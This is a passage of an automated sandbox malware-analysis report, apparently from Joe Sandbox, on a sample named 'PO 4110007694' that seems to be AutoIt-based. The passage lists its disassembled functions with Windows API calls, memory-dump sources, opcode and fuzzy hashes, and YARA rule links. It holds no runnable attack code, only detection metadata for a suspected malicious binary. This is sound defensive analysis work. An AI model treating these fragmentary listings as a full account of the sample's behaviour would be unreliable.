                                                                    • Instruction ID: 98a1b05839c5279d54fae54f8e0d9227ca75567deb427b45b36d54e61284b90d
                                                                    • Opcode Fuzzy Hash: f480e82bc6954823b7b07e8be5d329fe1d9f3ef732a2280333023f2c4d861195
                                                                    • Instruction Fuzzy Hash: 5141417690021CBFDB20DFA4CC85ADEBBB8EB09300F044199FA59B7191DA716F45DBA0
                                                                    Function 00C97946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C9F910,00000000,?,?,?,?), ref: 00C979DF
                                                                    • GetWindowLongW.USER32 ref: 00C979FC
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C97A0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: e45bc14e3c15bac06e8ee2e424c01d6aecadb1cdae8bc5d962741774dcbd17b9
                                                                    • Instruction ID: 414b794853ee27b4bc0b0b1a53fe00d7191ebdcf8441ccd9fabb3e138a07d034
                                                                    • Opcode Fuzzy Hash: e45bc14e3c15bac06e8ee2e424c01d6aecadb1cdae8bc5d962741774dcbd17b9
                                                                    • Instruction Fuzzy Hash: 6831B031215206ABDF118F38DC49BEA77A9EB05324F254725F875D22E0D731EE61AB50
                                                                    Function 00C973D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C97461
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C97475
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C97499
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: 203fbcdc47d809fff6e4c19dc571f1c03ed73c033ec11d0950d4ff9def3f6592
                                                                    • Instruction ID: 3975e4cac6b2b3d4b457d30aeab1b2672d456d6e70fc94fe1c9cf29136667950
                                                                    • Opcode Fuzzy Hash: 203fbcdc47d809fff6e4c19dc571f1c03ed73c033ec11d0950d4ff9def3f6592
                                                                    • Instruction Fuzzy Hash: 60219132510218BBDF118F54DC4AFEE3B69EB48724F110214FE156B1D1DA75AC51DBA0
                                                                    Function 00C97B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C97C4A
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C97C58
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C97C5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: 4832bf7bc8434ecbdc591665546d68f1a35da41646bf36cd75bd37ad586dce98
                                                                    • Instruction ID: 10c1d45c7efca7da64d5ec62b41c28a03edb027abb231a24cb8848786fac74f8
                                                                    • Opcode Fuzzy Hash: 4832bf7bc8434ecbdc591665546d68f1a35da41646bf36cd75bd37ad586dce98
                                                                    • Instruction Fuzzy Hash: B0218CB5615209AFDB10DF28DCC5EAB37ECEF4A354B140159FA119B3A1CB31EC51AAA0
                                                                    Function 00C96CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C96D3B
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C96D4B
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C96D70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: ad5808ca38056986609b186189c78edd72f95baa95ead05602f8d9649be99f6c
                                                                    • Instruction ID: 318a15d2de13aae33c58c99566ebf329a12fe65dc98d2c41645946b7f27b5578
                                                                    • Opcode Fuzzy Hash: ad5808ca38056986609b186189c78edd72f95baa95ead05602f8d9649be99f6c
                                                                    • Instruction Fuzzy Hash: 4B219232610118BFDF118F54DC49FBB3BBAEF89750F118129F9659B1E0C6719C5197A0
                                                                    Function 00C9770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C97772
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C97787
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C97794
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 0d60aa055bfd05fb5366f05bdcdb914d39535e85ebbd1f54c4dad1c8cae214f9
                                                                    • Instruction ID: d1ccb05bb15a4cc4df1cfa5507ef82e1d07025ab05b9f0949e4b4b57a52b55c3
                                                                    • Opcode Fuzzy Hash: 0d60aa055bfd05fb5366f05bdcdb914d39535e85ebbd1f54c4dad1c8cae214f9
                                                                    • Instruction Fuzzy Hash: 06113A72210208BFEF255FA1CC09FEB3768EF88B54F11422CFA5192090C271E811DB10
                                                                    Function 00C14C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C14BD0,?,00C14DEF,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14C11
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C14C23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-3689287502
                                                                    • Opcode ID: 79791ea41701a6d81eb6df438fdb402481d66dd76a7aaafb609f18c997d24467
                                                                    • Instruction ID: b2b47bb9605ee01de0b633b3d7281260b3154a55cee90a132316e62cf8e06b8b
                                                                    • Opcode Fuzzy Hash: 79791ea41701a6d81eb6df438fdb402481d66dd76a7aaafb609f18c997d24467
                                                                    • Instruction Fuzzy Hash: B4D01731611713CFDB20AFB1D91CB4ABAE5EF0A352B118C3ED496D6160E6B0D9C1CA90
                                                                    Function 00C14C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C14B83,?), ref: 00C14C44
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C14C56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-1355242751
                                                                    • Opcode ID: b043039cd2c1c7a0705b4a40515517551f22e1aa62a2bc3c2258239560a007ec
                                                                    • Instruction ID: f13eb50e1c1185ebd1ba98559b0b947af9b102e15c1abd0bee8cae8c7c73b749
                                                                    • Opcode Fuzzy Hash: b043039cd2c1c7a0705b4a40515517551f22e1aa62a2bc3c2258239560a007ec
                                                                    • Instruction Fuzzy Hash: 9BD01731610713CFDB249F31D92C74E7AE4AF06351B21883ED4A6DA560E770D9C0DA90
                                                                    Function 00C90DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00C91039), ref: 00C90DF5
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C90E07
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2574300362-4033151799
                                                                    • Opcode ID: f35a110a06339770b0c1e79945a9d00f79271bd4ff4894df43a86dcce9163cd3
                                                                    • Instruction ID: e14fab4d990f4fd9084955d4eec83c9691a6557bef98b11a5a5dd31cd8cf428f
                                                                    • Opcode Fuzzy Hash: f35a110a06339770b0c1e79945a9d00f79271bd4ff4894df43a86dcce9163cd3
                                                                    • Instruction Fuzzy Hash: DCD01771510722CFDB209F75D80CB8AB6E5AF05352F218C7ED4D6D2161EAB0D9D0CA90
                                                                    Function 00C890E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C88CF4,?,00C9F910), ref: 00C890EE
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C89100
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 2574300362-199464113
                                                                    • Opcode ID: db83a498d830440c52e67e96be4b0385bf7d76777556500cf80822d9bd732503
                                                                    • Instruction ID: f93aea3750dd1d282e4adea9467ad80f52dd34d6f0f046bd7fca61916dfe4e4b
                                                                    • Opcode Fuzzy Hash: db83a498d830440c52e67e96be4b0385bf7d76777556500cf80822d9bd732503
                                                                    • Instruction Fuzzy Hash: 32D01735614723CFDB20AF71D81C71E76E4AF05355B16883ED496D65A0EB70C880CB90
                                                                    Function 00C51714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime__swprintf
                                                                    • String ID: %.3d$WIN_XPe
                                                                    • API String ID: 2070861257-2409531811
                                                                    • Opcode ID: fa366ab87c1b12cd8d77dcd149279d65daf1fe9b9e96169bef06a0a44d9ed0bb
                                                                    • Instruction ID: e408951abc613d420101a176eb3b3f08ef424e3e9366d597fed05e3952c350e8
                                                                    • Opcode Fuzzy Hash: fa366ab87c1b12cd8d77dcd149279d65daf1fe9b9e96169bef06a0a44d9ed0bb
                                                                    • Instruction Fuzzy Hash: 25D01779844108FACB009B96988DFFD777CAB0D382F181462FC06E2040E2318BD9EA29
                                                                    Function 00C6717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c7456cffe0761f051c21db22a16a9f5473ee32f80362d4bf1cede0697c5f657
                                                                    • Instruction ID: b943913267d2342bce800a7abe144941251e86c72d86d97ed5b506b6f6bf12aa
                                                                    • Opcode Fuzzy Hash: 2c7456cffe0761f051c21db22a16a9f5473ee32f80362d4bf1cede0697c5f657
                                                                    • Instruction Fuzzy Hash: 1BC16275A04215EFCB24CFA4C888EAEBBB5FF48718B154A98E815DB351D730DE81DB90
                                                                    Function 00C8E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00C8E0BE
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00C8E101
                                                                      • Part of subcall function 00C8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C8D7C5
                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C8E301
                                                                    • _memmove.LIBCMT ref: 00C8E314
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                    • String ID:
                                                                    • API String ID: 3659485706-0
                                                                    • Opcode ID: d5efa3809001d6cdc8432b9219843acdec6e344604b0be749b535b23c0fb6985
                                                                    • Instruction ID: 915f07d761c89f33fd0227bd7bb3642f090449480b81d46b71f5ba3357d4aa6c
                                                                    • Opcode Fuzzy Hash: d5efa3809001d6cdc8432b9219843acdec6e344604b0be749b535b23c0fb6985
                                                                    • Instruction Fuzzy Hash: 6FC14A71608301DFC714EF28C490A6ABBE4FF89718F14896DF8999B351D731EA46CB86
                                                                    Function 00C88093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 00C880C3
                                                                    • CoUninitialize.OLE32 ref: 00C880CE
                                                                      • Part of subcall function 00C6D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C6D5D4
                                                                    • VariantInit.OLEAUT32(?), ref: 00C880D9
                                                                    • VariantClear.OLEAUT32(?), ref: 00C883AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 780911581-0
                                                                    • Opcode ID: 89eb0be710d9acdd99d0b3382f4f5591f0838adbb14d7b7e5cfe3bd174a9c9b8
                                                                    • Instruction ID: b8f3013293b3aaeb1246c70201d22d1145f2541510dbd82bc9cf200fc1ae5ba5
                                                                    • Opcode Fuzzy Hash: 89eb0be710d9acdd99d0b3382f4f5591f0838adbb14d7b7e5cfe3bd174a9c9b8
                                                                    • Instruction Fuzzy Hash: 93A188352047019FDB10EF14C495B6AB7E4FF8A318F448418F99A9B7A1CB30ED45EB86
                                                                    Function 00C67530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C676EA
                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C67702
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00C9FB80,000000FF,?,00000000,00000800,00000000,?,00CA2C7C,?), ref: 00C67727
                                                                    • _memcmp.LIBCMT ref: 00C67748
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                    • String ID:
                                                                    • API String ID: 314563124-0
                                                                    • Opcode ID: 60fbbbaa6dee016da55329436ed1765cf79f5e66675aab5a02625d7af7f1cfc7
                                                                    • Instruction ID: 4aea4ead734690646281b9cdae57dc4a9139467dd7c137a156d95d32762a34c1
                                                                    • Opcode Fuzzy Hash: 60fbbbaa6dee016da55329436ed1765cf79f5e66675aab5a02625d7af7f1cfc7
                                                                    • Instruction Fuzzy Hash: 00811C71A00109EFCB14DFA4C988EEEB7B9FF89315F204558F515AB250DB71AE46CB60
                                                                    Function 00C6687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                    • String ID:
                                                                    • API String ID: 2808897238-0
                                                                    • Opcode ID: ffd8655aef0b0002381ebd1c16f0ab5aad6883548f26dbe885612fd4ba336e77
                                                                    • Instruction ID: b3224e21028ee8ba77e1cdc44f50078453aad1ebd87fddc4eefbb56d9f11db1d
                                                                    • Opcode Fuzzy Hash: ffd8655aef0b0002381ebd1c16f0ab5aad6883548f26dbe885612fd4ba336e77
                                                                    • Instruction Fuzzy Hash: 695193747143019ADB34AFA6D8E5B6EB3E5AF45310F20D81FE596DB292DB70E880A701
                                                                    Function 00C997F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(017BEB70,?), ref: 00C99863
                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00C99896
                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C99903
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
